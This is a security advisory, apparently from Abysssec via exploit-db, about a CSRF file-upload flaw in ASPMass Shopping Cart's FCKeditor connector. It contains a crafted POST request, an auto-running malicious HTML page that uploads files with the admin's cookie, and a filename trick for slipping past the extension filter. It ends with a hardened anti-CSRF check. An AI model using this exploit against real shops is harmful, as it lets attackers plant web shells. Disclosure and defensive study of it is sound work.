'''
http://www.exploit-db.com/moaub-30-aspmass-shopping-cart-vulnerability-file-upload-csrf/
'''

Abysssec Inc Public Advisory

Title            : ASPMass Shopping Cart Vulnerability File Upload CSRF
Affected Version : ASPMass Shopping Cart 0.1
Discovery        : www.abysssec.com
Vendor           : http://www.aspmass.com/
Demo             : http://www.aspmass.com/demo.htm
Admin Page       : http://Example.com/Admin/Login.aspx

Description :
===========================================================================================
This version of ASP Shopping Cart has a CSRF vulnerability that allows uploading a file through FCKeditor. But we have two limitations:

1- We need the Admin's Cookie
2- Specific file extensions are enforced by FCKeditor v2; bypassing this barrier is on you.
   For example, a file named shell.aspx;me.xml will be uploaded as shell_aspx;me.xml

You can upload your file through these paths (of course with CSRF):

http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File
http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/
http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?time=1280125833981&Type=File&CurrentFolder=/
http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/test.html
http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html

Uploaded files will be placed in these paths:

.../Files/site/file/
.../Files/site/flash/
.../Files/site/image/
.../Files/site/media/

Vulnerable Code:

The misconfiguration is in ...\Images\js\fcKeditor\editor\filemanager\connectors\aspx\config.ascx, ln 40.
The only check the connector performs is a session flag; nothing ties the request to the admin's own browsing context, so any page the admin visits can trigger the upload with his cookie:

    private bool CheckAuthentication()
    {
        if (Session["AdminLogedIn"] == "Yes")
        {
            return true;
        }
        else
        {
            return false;
        }
    }

For example, you can feed this POST request to the Admin:
----------------------------------------------------------------------------------------
POST http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File&CurrentFolder=/ HTTP/1.1
Host: Example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/uploadtest.html
Cookie: ASP.NET_SessionId=ejskxhea4eqnkirsbxebj145
Content-Type: multipart/form-data; boundary=---------------------------92203111132182
Content-Length: 198

-----------------------------92203111132182
Content-Disposition: form-data; name="NewFile"; filename="Test.xml"
Content-Type: text/plain

This is a shell...
-----------------------------92203111132182--

With this POST request, the file Test.xml is uploaded to this path: .../Files/site/

The Source of the HTML Page (Malicious Link)
===========================================================================================
With this page, we send a request with AJAX to upload a file with the Admin's Cookie.

<html>
<head>
<title>Welcome to ASP Shopping Cart!</title>
Hello!
...
...
...
This page uploads a file with "xml" extension
<script>
var binary;
var filename;

function FileUpload()
{
    try {
        netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
    } catch (e) {
    }

    var http = false;
    if (window.XMLHttpRequest) {
        http = new XMLHttpRequest();
    } else if (window.ActiveXObject) {
        http = new ActiveXObject("Microsoft.XMLHTTP");
    }

    var url = "http://Example.com/Images/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=File&CurrentFolder=/";
    var filename = 'Test.xml';
    var filetext = ' This is a shell ... ';
    var boundaryString = '---------------------------92203111132182';
    var boundary = '--' + boundaryString;
    var requestbody = boundary + '\n'
        + 'Content-Disposition: form-data; name="NewFile"; filename="' + filename + '"' + '\n'
        + 'Content-Type: text/plain' + '\n'
        + '\n'
        + filetext + '\n'
        + boundary;

    http.onreadystatechange = done;
    http.open('POST', url, true);
    http.setRequestHeader("Content-type", "multipart/form-data; boundary=" + boundaryString);
    http.setRequestHeader("Connection", "close");
    http.setRequestHeader("Content-length", requestbody.length);
    http.send(requestbody);
}

function done()
{
    if (http.readyState == 4 && http.status == 200) {
        //alert(http.responseText);
        //alert('Upload OK');
    }
}
</script>
</head>
<body onload ="FileUpload();">
</body>
</html>
===========================================================================================
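A hardened replacement for the CheckAuthentication() in config.ascx described above, as an added example (not ASPMass or FCKeditor code): it keeps the session check but compares as strings, requires a per-session anti-CSRF token, and rejects requests whose Referer is not this site. The Session["CsrfToken"] name and the csrf query/form parameter are assumptions; the admin login page is assumed to generate the token and the page embedding the editor is assumed to append it to the connector URL.

```csharp
// Hardened CheckAuthentication() for FCKeditor's config.ascx (added example,
// not vendor code). Assumes: the admin login page stores a random per-session
// token in Session["CsrfToken"], and the page that embeds the editor passes it
// to the connector as ?csrf=<token>. Both names are hypothetical.
private bool CheckAuthentication()
{
    // 1. Session flag, compared as strings. The original
    //    `Session["AdminLogedIn"] == "Yes"` compares object to string by
    //    reference (compiler warning CS0252) and only works by coincidence.
    string loggedIn = Session["AdminLogedIn"] as string;
    if (!string.Equals(loggedIn, "Yes", StringComparison.Ordinal))
        return false;

    // 2. Synchronizer token. A cross-site page can make the browser send the
    //    admin's cookie, but it cannot read the token held in his session, so
    //    a forged upload fails here.
    string expected = Session["CsrfToken"] as string;
    string supplied = Request.QueryString["csrf"] ?? Request.Form["csrf"];
    if (string.IsNullOrEmpty(expected) || string.IsNullOrEmpty(supplied))
        return false;
    if (!ConstantTimeEquals(expected, supplied))
        return false;

    // 3. Defense in depth: the editor is only ever loaded from this host, so a
    //    missing or foreign Referer (e.g. the attacker's page) is rejected.
    string referer = Request.Headers["Referer"];
    if (string.IsNullOrEmpty(referer))
        return false;
    Uri refUri;
    if (!Uri.TryCreate(referer, UriKind.Absolute, out refUri) ||
        !string.Equals(refUri.Host, Request.Url.Host, StringComparison.OrdinalIgnoreCase))
        return false;

    return true;
}

// Compares two strings without stopping at the first mismatching character,
// so the token check does not leak how many leading characters matched.
private static bool ConstantTimeEquals(string a, string b)
{
    if (a.Length != b.Length)
        return false;
    int diff = 0;
    for (int i = 0; i < a.Length; i++)
        diff |= a[i] ^ b[i];
    return diff == 0;
}
```

The token is the primary control; the Referer check only adds depth, because some clients strip that header and relying on it alone would lock legitimate admins out.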